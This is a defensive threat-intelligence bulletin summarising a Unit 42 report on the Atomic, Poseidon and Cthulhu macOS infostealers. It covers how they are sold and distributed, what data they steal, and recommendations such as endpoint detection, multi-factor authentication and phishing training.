Summary:
Palo Alto Network’s Unit 42 has observed a growing number of attacks targeting macOS users with infostealer malware. Infostealer malware is typically designed to exfiltrate sensitive credentials, financial records, and intellectual property, which often leads to data breaches, financial losses and reputational damage. In their new blog post, researchers highlight three infostealers which have been commonly employed in attacks to target macOS systems — Atomic, Poseidon and Cthulhu.

Discovered in April 2023, Atomic Stealer (also known as AMOS) is sold as malware-as-a-service (MaaS) on hacker forums and Telegram. Several variants of this infostealer have been observed in the wild, with earlier ones written in Go and newer ones in C++. Some versions include a Python script, while others use Mach-O binaries. Atomic Stealer is primarily distributed via malvertising and is capable of stealing sensitive information such as notes, documents, browser data (passwords, cookies), cryptocurrency wallets, and instant messaging data (e.g., from Discord and Telegram).

Poseidon Stealer is considered a direct competitor or fork of Atomic Stealer and was developed by a actor known as “Rodrigo4,” who is believed to be a former Atomic Stealer coder. In August, 2024, Rodrigo4 sold the Poseidon Stealer MaaS to an unknown entity, with researchers noting that it has been active since then. Poseidon Stealer infects systems through Trojanized installers disguised as legitimate applications, typically distributed via Google ads and malicious spam emails. The installer contains an encoded AppleScript, which is decoded and executed during installation. This AppleScript is used to perform various activities including gathering system information, stealing browser passwords and cookies, cryptocurrency wallets, macOS Notes data, Telegram information, and passwords from BitWarden and KeePassXC password managers.

Cthulhu Stealer, another MaaS operation advertised on Telegram by the "Cthulhu Team," is written in Go and distributed through malicious application installers. When executed, it prompts fake dialog boxes asking for system and MetaMask passwords. Cthulhu Stealer targets a wide range of sensitive data from compromised macOS systems, including browser data (passwords, credit cards, history, cookies) from Chrome, Edge, and Firefox; cryptocurrency wallets; FileZilla configuration files; Telegram data; Notes app content; and passwords from Keychain and SafeStorage.

Security Officer Comments:
Infostealers accounted for the largest category of new macOS malware in 2024, with a 101% increase in macOS infostealers detected between the last two quarters of the year. These malware strains are typically indiscriminate, aiming to collect as much data as possible for financial gain. This broad data-stealing capability exposes organizations to significant risks, including data leaks and serving as a gateway for more destructive attacks like ransomware. Infostealers targeting macOS often exploit AppleScript, which offers extensive OS access and uses a natural language syntax, making it easier to execute. This allows threat actors to deceive victims through social engineering, such as prompting them to enter credentials or disable security controls.

Suggested Corrections:
Users should avoid clicking on sponsored ads at the top of Google search results, as cybercriminals can purchase these ads to promote sites offering cracked software, further leading to the deployment of infostealer payloads. Organizations should also implement endpoint detection software to identify and block the execution of malicious installers and scripts, implement multi-factor authentication where possible, and educate employees on phishing and social engineering tactics to prevent them from falling victim to potential infections.

Link(s):
https://unit42.paloaltonetworks.com/macos-stealers-growing/